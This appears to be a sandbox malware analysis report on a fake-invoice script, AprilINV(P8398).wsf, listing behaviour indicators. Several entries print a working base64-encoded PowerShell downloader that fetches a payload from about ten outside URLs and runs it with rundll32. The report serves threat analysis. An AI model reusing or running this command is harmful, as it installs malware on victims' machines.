"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ENC "UwB0AGEAcgB0AC0AUwBsAGUAZQBwACAALQBTAGUAYwBvAG4AZABzACAAMwA7ACQAUwBwAGgAeQBnAG0AbwBtAGEAbgBvAG0AZQB0AGUAcgBIAGEAaQBsAGUAcgBzACAAPQAgACgAIgBoAHQAdABwAHMAOgAvAC8AdABoAGUAcwBoAGkAcgB0AHMAdQBtAG0AaQB0AC4AYwBvAG0ALwBNAHcAQgBHAFMAbQAvAFgANAAzAFMAOQB0AEsAbABHADkAaABaACwAaAB0AHQAcAA6AC8ALwByAG8AcwBlAHcAbwBvAGQAbABhAG0AaQBuAGEAdABlAHMALgBjAG8AbQAvAGgAZQBhAC8AcwBmAGgAYwBDAGcALABoAHQAdABwAHMAOgAvAC8AcAByAG8AcABlAHIAdAB5AG4AZQBhAHIALgBjAG8ALgB1AGsALwBRAHkAWQBXAHkAcAAvAEYAQwBRAGkAbgBkAG0ALABoAHQAdABwAHMAOgAvAC8AYQBnAHQAZQBuAGQAZQBsAHAAZQByAHUALgBjAG8AbQAvAEYAUAB1ADAARgBhAC8AeQBXAG0ATgByAEoAYwA4AFEARQAsAGgAdAB0AHAAcwA6AC8ALwBnAHIAYQBmAGkAYwBhAGwAZQB2AGkALgBjAG8AbQAuAGIAcgAvADAAcAA2AFAALwAxAGIARQBUAGcAMQAsAGgAdAB0AHAAcwA6AC8ALwBjAGEAcABpAHQAYQBsAHAAZQByAHUAcgByAGgAaAAuAGMAbwBtAC8AdgBRADEAaQBRAGcALwBPAEIAWABRAEYAQwBnAFcALABoAHQAdABwAHMAOgAvAC8AawBtAHAAaABpAC4AYwBvAG0ALwBGAFcAbwB2AG0AQgAvAFgAMgA4AHkAeQBVAEwAcQAsAGgAdAB0AHAAcwA6AC8ALwBjAGUAbgB0AGUAcgBrAGkAYwBrAC4AYwBvAG0ALwBJAEMANQBFAFEAOAAvADUAZQB4AG8AcwAsAGgAdAB0AHAAcwA6AC8ALwBjAGgAaQBtAHAAYwBpAHQAeQAuAGMAbwBtAC8AaAA3AGUALwBaAEwAdQAxAEsAcAAiACkALgBzAHAAbABpAHQAKAAiACwAIgApADsAZgBvAHIAZQBhAGMAaAAgACgAJAB1AG4AaQBuAHMAdABpAG4AYwB0AGkAdgBlAG4AZQBzAHMATQBvAG4AbwBkAGkAbQBlAHQAcgBpAGMAIABpAG4AIAAkAFMAcABoAHkAZwBtAG8AbQBhAG4AbwBtAGUAdABlAHIASABhAGkAbABlAHIAcwApACAAewB0AHIAeQAgAHsAdwBnAGUAdAAgACQAdQBuAGkAbgBzAHQAaQBuAGMAdABpAHYAZQBuAGUAcwBzAE0AbwBuAG8AZABpAG0AZQB0AHIAaQBjACAALQBUAGkAbQBlAG8AdQB0AFMAZQBjACAAMQA5ACAALQBPACAAJABlAG4AdgA6AFQARQBNAFAAXABMAHUAYwBpAG4AYQBjAGUAYQAuAG0AdQBsAHQAaQBsAGkAdABoAE0AYQBqAG8AcgBpAHMAbQA7AGkAZgAgACgAKABHAGUAdAAtAEkAdABlAG0AIAAkAGUAbgB2ADoAVABFAE0AUABcAEwAdQBjAGkAbgBhAGMAZQBhAC4AbQB1AGwAdABpAGwAaQB0AGgATQBhAGoAbwByAGkAcwBtACkALgBsAGUAbgBnAHQAaAAgAC0AZwBlACAAMQAwADAAMAAwADAAKQAgAHsAcwB0AGEAcgB0ACAAcgB1AG4AZABsAGwAMwAyACAAJABlAG4AdgA6AFQARQBNAFAAXABcAEwAdQBjAGkAbgBhAGMAZQBhAC4AbQB1AGwAdABpAGwAaQB0AGgATQBhAGoAbwByAGkAcwBtACwAWAA1ADUANQA7AGIAcgBlAGEAawA7AH0AfQBjAGEAdABjAGgAIAB7AFMAdABhAHIAdAAtAFMAbABlAGUAcAAgAC0AUwBlAGMAbwBuAGQAcwAgADMAOwB9AH0A"

cmdline

powershell -ENC "UwB0AGEAcgB0AC0AUwBsAGUAZQBwACAALQBTAGUAYwBvAG4AZABzACAAMwA7ACQAUwBwAGgAeQBnAG0AbwBtAGEAbgBvAG0AZQB0AGUAcgBIAGEAaQBsAGUAcgBzACAAPQAgACgAIgBoAHQAdABwAHMAOgAvAC8AdABoAGUAcwBoAGkAcgB0AHMAdQBtAG0AaQB0AC4AYwBvAG0ALwBNAHcAQgBHAFMAbQAvAFgANAAzAFMAOQB0AEsAbABHADkAaABaACwAaAB0AHQAcAA6AC8ALwByAG8AcwBlAHcAbwBvAGQAbABhAG0AaQBuAGEAdABlAHMALgBjAG8AbQAvAGgAZQBhAC8AcwBmAGgAYwBDAGcALABoAHQAdABwAHMAOgAvAC8AcAByAG8AcABlAHIAdAB5AG4AZQBhAHIALgBjAG8ALgB1AGsALwBRAHkAWQBXAHkAcAAvAEYAQwBRAGkAbgBkAG0ALABoAHQAdABwAHMAOgAvAC8AYQBnAHQAZQBuAGQAZQBsAHAAZQByAHUALgBjAG8AbQAvAEYAUAB1ADAARgBhAC8AeQBXAG0ATgByAEoAYwA4AFEARQAsAGgAdAB0AHAAcwA6AC8ALwBnAHIAYQBmAGkAYwBhAGwAZQB2AGkALgBjAG8AbQAuAGIAcgAvADAAcAA2AFAALwAxAGIARQBUAGcAMQAsAGgAdAB0AHAAcwA6AC8ALwBjAGEAcABpAHQAYQBsAHAAZQByAHUAcgByAGgAaAAuAGMAbwBtAC8AdgBRADEAaQBRAGcALwBPAEIAWABRAEYAQwBnAFcALABoAHQAdABwAHMAOgAvAC8AawBtAHAAaABpAC4AYwBvAG0ALwBGAFcAbwB2AG0AQgAvAFgAMgA4AHkAeQBVAEwAcQAsAGgAdAB0AHAAcwA6AC8ALwBjAGUAbgB0AGUAcgBrAGkAYwBrAC4AYwBvAG0ALwBJAEMANQBFAFEAOAAvADUAZQB4AG8AcwAsAGgAdAB0AHAAcwA6AC8ALwBjAGgAaQBtAHAAYwBpAHQAeQAuAGMAbwBtAC8AaAA3AGUALwBaAEwAdQAxAEsAcAAiACkALgBzAHAAbABpAHQAKAAiACwAIgApADsAZgBvAHIAZQBhAGMAaAAgACgAJAB1AG4AaQBuAHMAdABpAG4AYwB0AGkAdgBlAG4AZQBzAHMATQBvAG4AbwBkAGkAbQBlAHQAcgBpAGMAIABpAG4AIAAkAFMAcABoAHkAZwBtAG8AbQBhAG4AbwBtAGUAdABlAHIASABhAGkAbABlAHIAcwApACAAewB0AHIAeQAgAHsAdwBnAGUAdAAgACQAdQBuAGkAbgBzAHQAaQBuAGMAdABpAHYAZQBuAGUAcwBzAE0AbwBuAG8AZABpAG0AZQB0AHIAaQBjACAALQBUAGkAbQBlAG8AdQB0AFMAZQBjACAAMQA5ACAALQBPACAAJABlAG4AdgA6AFQARQBNAFAAXABMAHUAYwBpAG4AYQBjAGUAYQAuAG0AdQBsAHQAaQBsAGkAdABoAE0AYQBqAG8AcgBpAHMAbQA7AGkAZgAgACgAKABHAGUAdAAtAEkAdABlAG0AIAAkAGUAbgB2ADoAVABFAE0AUABcAEwAdQBjAGkAbgBhAGMAZQBhAC4AbQB1AGwAdABpAGwAaQB0AGgATQBhAGoAbwByAGkAcwBtACkALgBsAGUAbgBnAHQAaAAgAC0AZwBlACAAMQAwADAAMAAwADAAKQAgAHsAcwB0AGEAcgB0ACAAcgB1AG4AZABsAGwAMwAyACAAJABlAG4AdgA6AFQARQBNAFAAXABcAEwAdQBjAGkAbgBhAGMAZQBhAC4AbQB1AGwAdABpAGwAaQB0AGgATQBhAGoAbwByAGkAcwBtACwAWAA1ADUANQA7AGIAcgBlAGEAawA7AH0AfQBjAGEAdABjAGgAIAB7AFMAdABhAHIAdAAtAFMAbABlAGUAcAAgAC0AUwBlAGMAbwBuAGQAcwAgADMAOwB9AH0A"

A process created a hidden window (1 event)

Time & API	Arguments	Status	Return	Repeated
ShellExecuteExW April 6, 2023, 9:49 a.m.	show_type: 0 filepath_r: powershell parameters: -ENC "UwB0AGEAcgB0AC0AUwBsAGUAZQBwACAALQBTAGUAYwBvAG4AZABzACAAMwA7ACQAUwBwAGgAeQBnAG0AbwBtAGEAbgBvAG0AZQB0AGUAcgBIAGEAaQBsAGUAcgBzACAAPQAgACgAIgBoAHQAdABwAHMAOgAvAC8AdABoAGUAcwBoAGkAcgB0AHMAdQBtAG0AaQB0AC4AYwBvAG0ALwBNAHcAQgBHAFMAbQAvAFgANAAzAFMAOQB0AEsAbABHADkAaABaACwAaAB0AHQAcAA6AC8ALwByAG8AcwBlAHcAbwBvAGQAbABhAG0AaQBuAGEAdABlAHMALgBjAG8AbQAvAGgAZQBhAC8AcwBmAGgAYwBDAGcALABoAHQAdABwAHMAOgAvAC8AcAByAG8AcABlAHIAdAB5AG4AZQBhAHIALgBjAG8ALgB1AGsALwBRAHkAWQBXAHkAcAAvAEYAQwBRAGkAbgBkAG0ALABoAHQAdABwAHMAOgAvAC8AYQBnAHQAZQBuAGQAZQBsAHAAZQByAHUALgBjAG8AbQAvAEYAUAB1ADAARgBhAC8AeQBXAG0ATgByAEoAYwA4AFEARQAsAGgAdAB0AHAAcwA6AC8ALwBnAHIAYQBmAGkAYwBhAGwAZQB2AGkALgBjAG8AbQAuAGIAcgAvADAAcAA2AFAALwAxAGIARQBUAGcAMQAsAGgAdAB0AHAAcwA6AC8ALwBjAGEAcABpAHQAYQBsAHAAZQByAHUAcgByAGgAaAAuAGMAbwBtAC8AdgBRADEAaQBRAGcALwBPAEIAWABRAEYAQwBnAFcALABoAHQAdABwAHMAOgAvAC8AawBtAHAAaABpAC4AYwBvAG0ALwBGAFcAbwB2AG0AQgAvAFgAMgA4AHkAeQBVAEwAcQAsAGgAdAB0AHAAcwA6AC8ALwBjAGUAbgB0AGUAcgBrAGkAYwBrAC4AYwBvAG0ALwBJAEMANQBFAFEAOAAvADUAZQB4AG8AcwAsAGgAdAB0AHAAcwA6AC8ALwBjAGgAaQBtAHAAYwBpAHQAeQAuAGMAbwBtAC8AaAA3AGUALwBaAEwAdQAxAEsAcAAiACkALgBzAHAAbABpAHQAKAAiACwAIgApADsAZgBvAHIAZQBhAGMAaAAgACgAJAB1AG4AaQBuAHMAdABpAG4AYwB0AGkAdgBlAG4AZQBzAHMATQBvAG4AbwBkAGkAbQBlAHQAcgBpAGMAIABpAG4AIAAkAFMAcABoAHkAZwBtAG8AbQBhAG4AbwBtAGUAdABlAHIASABhAGkAbABlAHIAcwApACAAewB0AHIAeQAgAHsAdwBnAGUAdAAgACQAdQBuAGkAbgBzAHQAaQBuAGMAdABpAHYAZQBuAGUAcwBzAE0AbwBuAG8AZABpAG0AZQB0AHIAaQBjACAALQBUAGkAbQBlAG8AdQB0AFMAZQBjACAAMQA5ACAALQBPACAAJABlAG4AdgA6AFQARQBNAFAAXABMAHUAYwBpAG4AYQBjAGUAYQAuAG0AdQBsAHQAaQBsAGkAdABoAE0AYQBqAG8AcgBpAHMAbQA7AGkAZgAgACgAKABHAGUAdAAtAEkAdABlAG0AIAAkAGUAbgB2ADoAVABFAE0AUABcAEwAdQBjAGkAbgBhAGMAZQBhAC4AbQB1AGwAdABpAGwAaQB0AGgATQBhAGoAbwByAGkAcwBtACkALgBsAGUAbgBnAHQAaAAgAC0AZwBlACAAMQAwADAAMAAwADAAKQAgAHsAcwB0AGEAcgB0ACAAcgB1AG4AZABsAGwAMwAyACAAJABlAG4AdgA6AFQARQBNAFAAXABcAEwAdQBjAGkAbgBhAGMAZQBhAC4AbQB1AGwAdABpAGwAaQB0AGgATQBhAGoAbwByAGkAcwBtACwAWAA1ADUANQA7AGIAcgBlAGEAawA7AH0AfQBjAGEAdABjAGgAIAB7AFMAdABhAHIAdAAtAFMAbABlAGUAcAAgAC0AUwBlAGMAbwBuAGQAcwAgADMAOwB9AH0A" filepath: powershell	1	1	0

Checks for the Locally Unique Identifier on the system for a suspicious privilege (1 event)

Time & API	Arguments	Status	Return	Repeated
LookupPrivilegeValueW April 6, 2023, 9:49 a.m.	system_name: privilege_name: SeDebugPrivilege	1	1	0

Yara rule detected in process memory (8 events)

description	(no description)	rule	DebuggerCheck__GlobalFlags
description	(no description)	rule	DebuggerCheck__QueryInfo
description	(no description)	rule	DebuggerHiding__Thread
description	(no description)	rule	DebuggerHiding__Active
description	(no description)	rule	ThreadControl__Context
description	(no description)	rule	SEH__vectored
description	Checks if being debugged	rule	anti_dbg
description	Bypass DEP	rule	disable_dep

One or more non-whitelisted processes were created (2 events)

parent_process	wscript.exe				martian_process	"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ENC "UwB0AGEAcgB0AC0AUwBsAGUAZQBwACAALQBTAGUAYwBvAG4AZABzACAAMwA7ACQAUwBwAGgAeQBnAG0AbwBtAGEAbgBvAG0AZQB0AGUAcgBIAGEAaQBsAGUAcgBzACAAPQAgACgAIgBoAHQAdABwAHMAOgAvAC8AdABoAGUAcwBoAGkAcgB0AHMAdQBtAG0AaQB0AC4AYwBvAG0ALwBNAHcAQgBHAFMAbQAvAFgANAAzAFMAOQB0AEsAbABHADkAaABaACwAaAB0AHQAcAA6AC8ALwByAG8AcwBlAHcAbwBvAGQAbABhAG0AaQBuAGEAdABlAHMALgBjAG8AbQAvAGgAZQBhAC8AcwBmAGgAYwBDAGcALABoAHQAdABwAHMAOgAvAC8AcAByAG8AcABlAHIAdAB5AG4AZQBhAHIALgBjAG8ALgB1AGsALwBRAHkAWQBXAHkAcAAvAEYAQwBRAGkAbgBkAG0ALABoAHQAdABwAHMAOgAvAC8AYQBnAHQAZQBuAGQAZQBsAHAAZQByAHUALgBjAG8AbQAvAEYAUAB1ADAARgBhAC8AeQBXAG0ATgByAEoAYwA4AFEARQAsAGgAdAB0AHAAcwA6AC8ALwBnAHIAYQBmAGkAYwBhAGwAZQB2AGkALgBjAG8AbQAuAGIAcgAvADAAcAA2AFAALwAxAGIARQBUAGcAMQAsAGgAdAB0AHAAcwA6AC8ALwBjAGEAcABpAHQAYQBsAHAAZQByAHUAcgByAGgAaAAuAGMAbwBtAC8AdgBRADEAaQBRAGcALwBPAEIAWABRAEYAQwBnAFcALABoAHQAdABwAHMAOgAvAC8AawBtAHAAaABpAC4AYwBvAG0ALwBGAFcAbwB2AG0AQgAvAFgAMgA4AHkAeQBVAEwAcQAsAGgAdAB0AHAAcwA6AC8ALwBjAGUAbgB0AGUAcgBrAGkAYwBrAC4AYwBvAG0ALwBJAEMANQBFAFEAOAAvADUAZQB4AG8AcwAsAGgAdAB0AHAAcwA6AC8ALwBjAGgAaQBtAHAAYwBpAHQAeQAuAGMAbwBtAC8AaAA3AGUALwBaAEwAdQAxAEsAcAAiACkALgBzAHAAbABpAHQAKAAiACwAIgApADsAZgBvAHIAZQBhAGMAaAAgACgAJAB1AG4AaQBuAHMAdABpAG4AYwB0AGkAdgBlAG4AZQBzAHMATQBvAG4AbwBkAGkAbQBlAHQAcgBpAGMAIABpAG4AIAAkAFMAcABoAHkAZwBtAG8AbQBhAG4AbwBtAGUAdABlAHIASABhAGkAbABlAHIAcwApACAAewB0AHIAeQAgAHsAdwBnAGUAdAAgACQAdQBuAGkAbgBzAHQAaQBuAGMAdABpAHYAZQBuAGUAcwBzAE0AbwBuAG8AZABpAG0AZQB0AHIAaQBjACAALQBUAGkAbQBlAG8AdQB0AFMAZQBjACAAMQA5ACAALQBPACAAJABlAG4AdgA6AFQARQBNAFAAXABMAHUAYwBpAG4AYQBjAGUAYQAuAG0AdQBsAHQAaQBsAGkAdABoAE0AYQBqAG8AcgBpAHMAbQA7AGkAZgAgACgAKABHAGUAdAAtAEkAdABlAG0AIAAkAGUAbgB2ADoAVABFAE0AUABcAEwAdQBjAGkAbgBhAGMAZQBhAC4AbQB1AGwAdABpAGwAaQB0AGgATQBhAGoAbwByAGkAcwBtACkALgBsAGUAbgBnAHQAaAAgAC0AZwBlACAAMQAwADAAMAAwADAAKQAgAHsAcwB0AGEAcgB0ACAAcgB1AG4AZABsAGwAMwAyACAAJABlAG4AdgA6AFQARQBNAFAAXABcAEwAdQBjAGkAbgBhAGMAZQBhAC4AbQB1AGwAdABpAGwAaQB0AGgATQBhAGoAbwByAGkAcwBtACwAWAA1ADUANQA7AGIAcgBlAGEAawA7AH0AfQBjAGEAdABjAGgAIAB7AFMAdABhAHIAdAAtAFMAbABlAGUAcAAgAC0AUwBlAGMAbwBuAGQAcwAgADMAOwB9AH0A"
parent_process	wscript.exe				martian_process	powershell -ENC "UwB0AGEAcgB0AC0AUwBsAGUAZQBwACAALQBTAGUAYwBvAG4AZABzACAAMwA7ACQAUwBwAGgAeQBnAG0AbwBtAGEAbgBvAG0AZQB0AGUAcgBIAGEAaQBsAGUAcgBzACAAPQAgACgAIgBoAHQAdABwAHMAOgAvAC8AdABoAGUAcwBoAGkAcgB0AHMAdQBtAG0AaQB0AC4AYwBvAG0ALwBNAHcAQgBHAFMAbQAvAFgANAAzAFMAOQB0AEsAbABHADkAaABaACwAaAB0AHQAcAA6AC8ALwByAG8AcwBlAHcAbwBvAGQAbABhAG0AaQBuAGEAdABlAHMALgBjAG8AbQAvAGgAZQBhAC8AcwBmAGgAYwBDAGcALABoAHQAdABwAHMAOgAvAC8AcAByAG8AcABlAHIAdAB5AG4AZQBhAHIALgBjAG8ALgB1AGsALwBRAHkAWQBXAHkAcAAvAEYAQwBRAGkAbgBkAG0ALABoAHQAdABwAHMAOgAvAC8AYQBnAHQAZQBuAGQAZQBsAHAAZQByAHUALgBjAG8AbQAvAEYAUAB1ADAARgBhAC8AeQBXAG0ATgByAEoAYwA4AFEARQAsAGgAdAB0AHAAcwA6AC8ALwBnAHIAYQBmAGkAYwBhAGwAZQB2AGkALgBjAG8AbQAuAGIAcgAvADAAcAA2AFAALwAxAGIARQBUAGcAMQAsAGgAdAB0AHAAcwA6AC8ALwBjAGEAcABpAHQAYQBsAHAAZQByAHUAcgByAGgAaAAuAGMAbwBtAC8AdgBRADEAaQBRAGcALwBPAEIAWABRAEYAQwBnAFcALABoAHQAdABwAHMAOgAvAC8AawBtAHAAaABpAC4AYwBvAG0ALwBGAFcAbwB2AG0AQgAvAFgAMgA4AHkAeQBVAEwAcQAsAGgAdAB0AHAAcwA6AC8ALwBjAGUAbgB0AGUAcgBrAGkAYwBrAC4AYwBvAG0ALwBJAEMANQBFAFEAOAAvADUAZQB4AG8AcwAsAGgAdAB0AHAAcwA6AC8ALwBjAGgAaQBtAHAAYwBpAHQAeQAuAGMAbwBtAC8AaAA3AGUALwBaAEwAdQAxAEsAcAAiACkALgBzAHAAbABpAHQAKAAiACwAIgApADsAZgBvAHIAZQBhAGMAaAAgACgAJAB1AG4AaQBuAHMAdABpAG4AYwB0AGkAdgBlAG4AZQBzAHMATQBvAG4AbwBkAGkAbQBlAHQAcgBpAGMAIABpAG4AIAAkAFMAcABoAHkAZwBtAG8AbQBhAG4AbwBtAGUAdABlAHIASABhAGkAbABlAHIAcwApACAAewB0AHIAeQAgAHsAdwBnAGUAdAAgACQAdQBuAGkAbgBzAHQAaQBuAGMAdABpAHYAZQBuAGUAcwBzAE0AbwBuAG8AZABpAG0AZQB0AHIAaQBjACAALQBUAGkAbQBlAG8AdQB0AFMAZQBjACAAMQA5ACAALQBPACAAJABlAG4AdgA6AFQARQBNAFAAXABMAHUAYwBpAG4AYQBjAGUAYQAuAG0AdQBsAHQAaQBsAGkAdABoAE0AYQBqAG8AcgBpAHMAbQA7AGkAZgAgACgAKABHAGUAdAAtAEkAdABlAG0AIAAkAGUAbgB2ADoAVABFAE0AUABcAEwAdQBjAGkAbgBhAGMAZQBhAC4AbQB1AGwAdABpAGwAaQB0AGgATQBhAGoAbwByAGkAcwBtACkALgBsAGUAbgBnAHQAaAAgAC0AZwBlACAAMQAwADAAMAAwADAAKQAgAHsAcwB0AGEAcgB0ACAAcgB1AG4AZABsAGwAMwAyACAAJABlAG4AdgA6AFQARQBNAFAAXABcAEwAdQBjAGkAbgBhAGMAZQBhAC4AbQB1AGwAdABpAGwAaQB0AGgATQBhAGoAbwByAGkAcwBtACwAWAA1ADUANQA7AGIAcgBlAGEAawA7AH0AfQBjAGEAdABjAGgAIAB7AFMAdABhAHIAdAAtAFMAbABlAGUAcAAgAC0AUwBlAGMAbwBuAGQAcwAgADMAOwB9AH0A"

Resumed a suspended thread in a remote process potentially indicative of process injection (2 events)

Time & API	Arguments	Status	Return	Repeated
Process injection	Process 300 resumed a thread in remote process 2088
NtResumeThread April 6, 2023, 9:49 a.m.	thread_handle: 0x0000012c suspend_count: 1 process_identifier: 2088	1	0	0

The process wscript.exe wrote an executable file to disk which it then attempted to execute (1 event)

file	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

AprilINV(P8398).wsf

Process Tree Toggle all

Network Toggle all

Suricata Toggle all

Suricata Alerts

Suricata TLS

Signatures Toggle All